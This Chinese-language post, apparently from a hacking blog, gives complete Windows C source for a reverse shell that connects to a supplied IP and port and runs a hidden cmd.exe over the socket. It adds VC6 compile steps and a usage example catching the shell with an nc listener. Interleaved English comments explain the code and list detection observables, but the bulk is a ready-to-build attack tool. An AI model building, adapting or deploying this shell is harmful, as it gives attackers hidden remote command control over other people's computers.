老鬼的话:
在VC6.0中新建一个WIN32 CONSOLE 程序,然后将以下代码粘进去
// GetCmdShell.cpp : Defines the entry point for the console application. //
/* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +老鬼 [QQ:147399120] 收集整理,转载请注明出处 http://www.qhwins.com + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ */ //#include <stdafx.h>
#include <winsock2.h> #include <stdio.h> #include <winsock.h> #include <stdlib.h>
#define RCVBUFSIZE 32
/*
 * Entry point of a connect-back ("reverse") command shell.
 *
 * Behaviour visible in this function:
 *   1. Reads a target IPv4 address and TCP port from argv[1]/argv[2].
 *   2. Opens a TCP connection to that address (outbound, client side).
 *   3. Spawns %COMSPEC% (cmd.exe) with its stdin/stdout/stderr redirected
 *      to the connected socket and its window hidden, so whoever listens on
 *      the remote end drives the shell.
 *   4. Blocks until cmd.exe exits, then closes the handles and the socket.
 *
 * Defender-relevant observables: a single process makes an outbound TCP
 * connection and immediately creates a cmd.exe child (inherit handles = TRUE,
 * STARTF_USESTDHANDLES, SW_HIDE); cmd.exe's standard handles are a socket
 * rather than a console or pipe. Egress filtering and process-creation
 * telemetry correlated with network connections both catch this pattern.
 *
 * Note: argc is never checked, so argv[1]/argv[2] are read unconditionally.
 */
void main(int argc,char *argv[])
{
    //Declaring the vars
    int sock;                    // Winsock SOCKET stored in an int (value is later cast to HANDLE)
    struct sockaddr_in cbAddr;   // remote (listener) address, filled below
    unsigned short cbPort;       // remote TCP port from argv[2]
    char *cbIp;                  // remote IPv4 address string from argv[1]
    WSADATA wsaData;
    STARTUPINFO si;              // carries the socket as std handles into the child
    PROCESS_INFORMATION pi={0};  // zeroed, so on CreateProcess failure the handles below are NULL
    char comspec[MAX_PATH];      // path of the command interpreter, from %COMSPEC%

    //parsing arguments to the corresponding vars.
    // No argc check and no validation of either value (atoi returns 0 on garbage).
    cbIp = argv[1];
    cbPort = atoi(argv[2]);

    //starting up wsa
    if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0)
    {
        printf("WSAStartup() failed");
        exit(1);
    }

    // WSASocket() with dwFlags 0 rather than socket(): presumably chosen so the
    // handle is non-overlapped and usable as a child's standard handle -- the
    // original author's comment only insists on WSASocket without saying why.
    if ((sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,0,0,0)) < 0)
    {
        printf("Socket Failed\n");
        WSACleanup();
        exit(1);
    }

    //filling the struct
    // inet_addr() result is not checked, so an unparsable address is used as-is.
    memset(&cbAddr, 0, sizeof(cbAddr));
    cbAddr.sin_family = AF_INET;
    cbAddr.sin_addr.s_addr = inet_addr(cbIp);
    cbAddr.sin_port = htons(cbPort);

    // Outbound connection to the listener given on the command line.
    // (The original comment says "echo server", a leftover from the code this was adapted from.)
    if (connect(sock, (struct sockaddr *) &cbAddr, sizeof(cbAddr)) < 0)
    {
        printf("connect() failed\n");
        closesocket(sock);
        WSACleanup();
        exit(1);
    }

    // Set up STARTUPINFO so the child gets bidirectional traffic over the socket:
    // all three standard handles point at the connected socket and the window is hidden.
    memset(&si,0,sizeof(si));
    GetStartupInfo(&si);
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.hStdInput = (HANDLE)sock;
    si.hStdOutput = (HANDLE)sock;
    si.hStdError =(HANDLE)sock;

    // Resolve the interpreter from the environment instead of hard-coding cmd.exe.
    // This exit path does not call WSACleanup(), unlike the earlier ones.
    if(GetEnvironmentVariable("COMSPEC", comspec, MAX_PATH) == 0)
    {
        printf("Environment var failed\n");
        closesocket(sock);
        exit(1);
    }

    // bInheritHandles = TRUE is what lets the socket handles in `si` reach the child.
    // On failure this branch does not exit: execution falls through to the
    // WaitForSingleObject below with pi.hProcess == NULL.
    if(!CreateProcess(NULL,comspec, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, 0, NULL, &si, &pi)) //CREATE_NO_WINDOW
    {
        printf("process creation failed\n");
        closesocket(sock);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }

    // Block for the lifetime of the shell, then release everything.
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    closesocket(sock);
}
在编译的时候可能会报错,用以下方法配置。
一、工程>设置>c\c++>Y分类里面选择预编译头(页眉)>选择“不使用补偿页眉”>
上面设置完以后可能还会报错,解决方法:
二、同一位置,切换到LINK选项卡,找到库文件列表,加入 ws2_32.lib库即可。
编译通过,然后在CMD下面调用测试,成功返回CMDSHELL。
方法:getcmdshell.exe 192.168.1.15 808
然后NC监听的窗口中成功返回远程的CMDSHELL。